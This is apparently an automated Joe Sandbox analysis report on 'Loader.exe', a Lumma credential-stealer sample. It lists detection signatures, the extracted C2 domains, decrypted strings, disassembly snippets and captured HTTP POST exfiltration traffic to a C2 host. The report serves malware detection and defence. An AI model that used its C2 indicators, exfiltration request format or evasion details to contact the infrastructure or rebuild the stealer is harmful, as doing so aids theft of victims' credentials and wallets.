Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1581552
MD5:89c77bce077f8e9da11c4d6a6c496db1
SHA1:43c62a61c90fb05dfdd19c871d9406b61e10d948
SHA256:2f030fcc8d51309c46b8913109dbb5b6821d5b69da971962370d8470db1ad830
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 2612 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 89C77BCE077F8E9DA11C4D6A6C496DB1)
    • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 5396 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 89C77BCE077F8E9DA11C4D6A6C496DB1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "cureprouderio.click", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--hubcpvkeaidz"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Loader.exe PID: 5396JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Loader.exe PID: 5396JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:13:59.265947+010020283713Unknown Traffic192.168.2.549708172.67.132.7443TCP
                2024-12-28T04:14:01.301951+010020283713Unknown Traffic192.168.2.549709172.67.132.7443TCP
                2024-12-28T04:14:03.769915+010020283713Unknown Traffic192.168.2.549710172.67.132.7443TCP
                2024-12-28T04:14:06.072098+010020283713Unknown Traffic192.168.2.549711172.67.132.7443TCP
                2024-12-28T04:14:08.439165+010020283713Unknown Traffic192.168.2.549712172.67.132.7443TCP
                2024-12-28T04:14:11.204433+010020283713Unknown Traffic192.168.2.549713172.67.132.7443TCP
                2024-12-28T04:14:13.829357+010020283713Unknown Traffic192.168.2.549714172.67.132.7443TCP
                2024-12-28T04:14:17.467661+010020283713Unknown Traffic192.168.2.549718172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:14:00.028753+010020546531A Network Trojan was detected192.168.2.549708172.67.132.7443TCP
                2024-12-28T04:14:02.110528+010020546531A Network Trojan was detected192.168.2.549709172.67.132.7443TCP
                2024-12-28T04:14:18.223149+010020546531A Network Trojan was detected192.168.2.549718172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:14:00.028753+010020498361A Network Trojan was detected192.168.2.549708172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:14:02.110528+010020498121A Network Trojan was detected192.168.2.549709172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:14:04.647437+010020480941Malware Command and Control Activity Detected192.168.2.549710172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T04:14:13.833616+010028438641A Network Trojan was detected192.168.2.549714172.67.132.7443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "cureprouderio.click", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--hubcpvkeaidz"}
                Source: Loader.exeVirustotal: Detection: 40%Perma Link
                Source: Loader.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: cureprouderio.click
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString decryptor: LPnhqo--hubcpvkeaidz
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417745 CryptUnprotectData,3_2_00417745
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00A81FE9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A81F38 FindFirstFileExW,0_2_00A81F38
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00A81FE9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A81F38 FindFirstFileExW,3_2_00A81F38
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_0042D0CD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, eax3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00409400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-65h]3_2_0043D4E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000278h]3_2_00417745
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00440770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4557D5DCh]3_2_004387D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then xor ebx, ebx3_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax3_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h3_2_004158FC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00416896
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]3_2_0042C89E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B8BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B963
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx+04h]3_2_0040D907
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h3_2_0041598C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+06h]3_2_0041B9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5C093193h]3_2_0041B25A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx3_2_00417A75
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00417207
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B215
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043F286
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [edx], cx3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2DCF3881h]3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417AB8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000098h]3_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]3_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0043DB10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0043D325
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4EB33D1Fh]3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]3_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then test eax, eax3_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax3_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041A3A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h3_2_0040B3BB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-2Ch]3_2_0043E450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_00426430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+28h]3_2_0040E49F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [0044A454h]3_2_0040C4AE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042856C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, dword ptr [00446180h]3_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh3_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00418DC5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041D5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]3_2_0041864E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428630
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp cl, 0000002Eh3_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+28h]3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429E80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-098D4F7Eh]3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0043CEA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409EB9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00418F52
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435F00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx]3_2_0040AF23
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx]3_2_0043F730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004167E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_00424F80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-1EB1B624h]3_2_004257AC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49718 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49709 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49714 -> 172.67.132.7:443
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: cureprouderio.click
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 172.67.132.7:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.132.7:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5JQYYRU4ZWU28LYM79User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M7OTKUL40DGVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M8ZODEKLZRZCRAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20550Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=803Z290KWT6RJEV57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZ2GIHF5D30ZJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585642Host: cureprouderio.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: cureprouderio.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: cureprouderio.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
                Source: Loader.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Loader.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Loader.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Loader.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Loader.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
